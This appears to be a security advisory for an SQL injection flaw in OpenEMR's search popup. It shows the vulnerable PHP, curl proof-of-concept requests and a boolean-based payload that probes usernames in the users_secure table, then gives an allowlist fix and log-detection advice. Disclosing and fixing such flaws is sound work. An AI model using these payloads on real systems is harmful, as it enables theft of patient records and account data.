# CVE-2026-29187 - SQL Injection Vulnerability in new search popup

### Weakness

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. Learn more on MITRE.

### Summary

OpenEMR versions before 8.0.0.3 contain a SQL injection vulnerability in the new search popup that can be exploited by authenticated attackers. The vulnerability exists due to insufficient input validation in the new search popup functionality.

### Details

The vulnerability occurs in the new search popup functionality, where the field name taken from the user-supplied `mf_` request parameter key is concatenated directly into the SQL query, both in the relevance expression of the SELECT list and in the WHERE condition, without proper sanitization. The `add_escape_custom()` call applied to it only escapes quote characters (the `\"` visible in the PoC output below), which does not neutralize input that lands in identifier position rather than inside a string literal. This allows attackers to inject malicious SQL code.
The vulnerability affects the following lines of `interface/new/new_search_popup.php`:

- [line 141](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L141)
- lines [134](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L134) and [136](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L136)
- lines [125](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L125) and [128](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L128)

```php
foreach ($_REQUEST as $key => $value) {
    if (!str_starts_with((string) $key, 'mf_')) {
        continue; // "match field"
    }

    // The remainder of the request parameter *name* becomes a column name below.
    $fldname = substr((string) $key, 3);

    // pubpid requires special treatment. Match on that is fatal.
    if ($fldname == 'pubpid') {
        // Field name concatenated into the relevance expression; only the value is bound.
        $relevance .= " + 1000 * ( " . add_escape_custom($fldname) . " LIKE ? )";
        array_push($sqlBindArray, $value);
    } else {
        $relevance .= " + ( " . add_escape_custom($fldname) . " LIKE ? )";
        array_push($sqlBindArray, $value);
    }

    // Field name concatenated into the WHERE condition in the same way.
    $where .= " OR " . add_escape_custom($fldname) . " LIKE ?";
    array_push($sqlBindArraySpecial, $value);

    echo "\n";
    ++$numfields;
}

$sql = "SELECT *, ( $relevance ) AS relevance, " .
    "DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS " .
    "FROM patient_data WHERE $where " .
    "ORDER BY relevance DESC, lname, fname, mname " .
    "LIMIT " . escape_limit($fstart) . ", " . escape_limit($MAXSHOW) . "";

$sqlBindArray = array_merge($sqlBindArray, $sqlBindArraySpecial);
$rez = sqlStatement($sql, $sqlBindArray); // line 141
```

Shape of the generated query; the request-supplied field name is placed in the empty positions before each `LIKE ?`:

```sql
SELECT *, ( 0 + (  LIKE ? ) ) AS relevance,
       DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS
FROM patient_data
WHERE 1 = 0 OR  LIKE ?
ORDER BY relevance DESC, lname, fname, mname
LIMIT 0, 100
```

### PoC

```
┌──(kali㉿kali)-[~]
└─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'https://172.18.0.3/interface/new/new_search_popup.php?mf_"=test'
SQL Statement failed on preparation: SELECT *, ( 0 + ( \" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR \" LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100'

Query Error

ERROR: query failed: SELECT *, ( 0 + ( \" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR \" LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100

Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patien...' at line 1


/var/www/localhost/htdocs/openemr/interface/new/new_search_popup.php at 141:sqlStatement

┌──(kali㉿kali)-[~]
└─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'http://172.18.0.3/interface/new/new_search_popup.php?mf_(SELECT(username)FROM(users_secure))=ad_in%'

┌──(kali㉿kali)-[~]
└─$
```

There are multiple techniques to exploit it; one of them is a boolean-based attack, which works using the last payload above. The query it produces is:

```sql
SELECT *, ( 0 + ( (SELECT(username)FROM(users_secure)) LIKE "ad_in%" ) ) AS relevance,
       DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS
FROM patient_data
WHERE 1 = 0 OR (SELECT(username)FROM(users_secure)) LIKE "ad_in%"
ORDER BY relevance DESC, lname, fname, mname
LIMIT 0, 100
```

### Impact

- Unauthorized access to database information
- Potential data breach of sensitive medical information
- Server-side code execution (in some cases)
- Database compromise

### Vulnerability Fix Process

1. Assess and validate the vulnerability
2. Request or assign a CVE ID
3. Create a private fork or private branch
4. Develop the fix
5. Write regression and security tests
6. Prepare release notes and security advisory draft
7. Publish the fix (code merge) and release a patched version
8. Publicly disclose the vulnerability

### Credits

- Researcher: Christophe SUBLET
- Organization: Grenoble INP - Esisar, UGA
- Project: CyberSkills, Orion
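### Remediation example (added)

The root cause is that a request parameter name is used as a SQL identifier, and quote escaping cannot protect an identifier. The following is an added example, not OpenEMR's actual patch for this CVE: it rebuilds the query construction from the excerpt above so that the field name is checked against an allowlist of column names before any SQL string is assembled, while the match values stay as bound `?` parameters as before. `SEARCH_COLUMNS`, `buildSearchSql()` and the column list are assumptions made for this demo; the real `patient_data` schema and OpenEMR's own helpers are not used, so it runs with a plain PHP CLI.

```php
<?php
// Added example (not OpenEMR's code): same query shape as the vulnerable
// excerpt, but the request-supplied field name is validated against an
// allowlist of known column names instead of being escaped as if it were a
// string literal. Column list and function names are assumptions for the demo.

declare(strict_types=1);

/** patient_data columns the search popup may match on (assumed subset). */
const SEARCH_COLUMNS = ['pubpid', 'lname', 'fname', 'mname', 'DOB', 'phone_home', 'email'];

/**
 * Builds [sql, bindArray] from a request array. Throws if any mf_<field>
 * key names something outside SEARCH_COLUMNS, so the identifier position
 * in the SQL string can only ever hold a known column name.
 */
function buildSearchSql(array $request, int $fstart, int $maxshow): array
{
    $relevance = '0';
    $where = '1 = 0';
    $relevanceBinds = [];
    $whereBinds = [];

    foreach ($request as $key => $value) {
        if (!str_starts_with((string) $key, 'mf_')) {
            continue; // only "match field" parameters are considered
        }
        $fldname = substr((string) $key, 3);

        // The fix: reject anything that is not a known column. A key such as
        // mf_" or mf_(SELECT ...) never reaches the SQL string.
        if (!in_array($fldname, SEARCH_COLUMNS, true)) {
            throw new InvalidArgumentException('Unknown search field: ' . $fldname);
        }
        $column = '`' . $fldname . '`'; // safe to quote: it is one of our own names

        // pubpid keeps its heavier weighting, as in the original logic.
        $weight = ($fldname === 'pubpid') ? '1000 * ' : '';
        $relevance .= " + {$weight}( {$column} LIKE ? )";
        $relevanceBinds[] = (string) $value;

        $where .= " OR {$column} LIKE ?";
        $whereBinds[] = (string) $value;
    }

    $sql = "SELECT *, ( $relevance ) AS relevance, "
        . "DATE_FORMAT(DOB,'%m/%d/%Y') AS DOB_TS "
        . "FROM patient_data WHERE $where "
        . "ORDER BY relevance DESC, lname, fname, mname "
        . 'LIMIT ' . max(0, $fstart) . ', ' . max(1, $maxshow);

    // Placeholder order in the SQL string: relevance placeholders first, then WHERE ones.
    return [$sql, array_merge($relevanceBinds, $whereBinds)];
}

// Constructed sample request: two legitimate match fields.
[$sql, $binds] = buildSearchSql(['mf_lname' => 'Smith%', 'mf_pubpid' => '12%'], 0, 100);
echo $sql, "\n", json_encode($binds), "\n";

// Constructed sample request using the key from the PoC: rejected before any SQL exists.
try {
    buildSearchSql(['mf_"' => 'test'], 0, 100);
} catch (InvalidArgumentException $e) {
    echo 'Rejected: ', $e->getMessage(), "\n";
}
```

The design choice is to treat the field name as an enumeration, not as data: escaping belongs to the bound values, and the only acceptable identifiers are the ones the application itself declares. For detection on an unpatched instance, requests to `new_search_popup.php` whose `mf_` parameter names contain anything other than a plain column name (quotes, parentheses, keywords) are the signal to look for in web server logs, and the "SQL Statement failed on preparation" error shown in the PoC output is what the application log records when such a request is attempted.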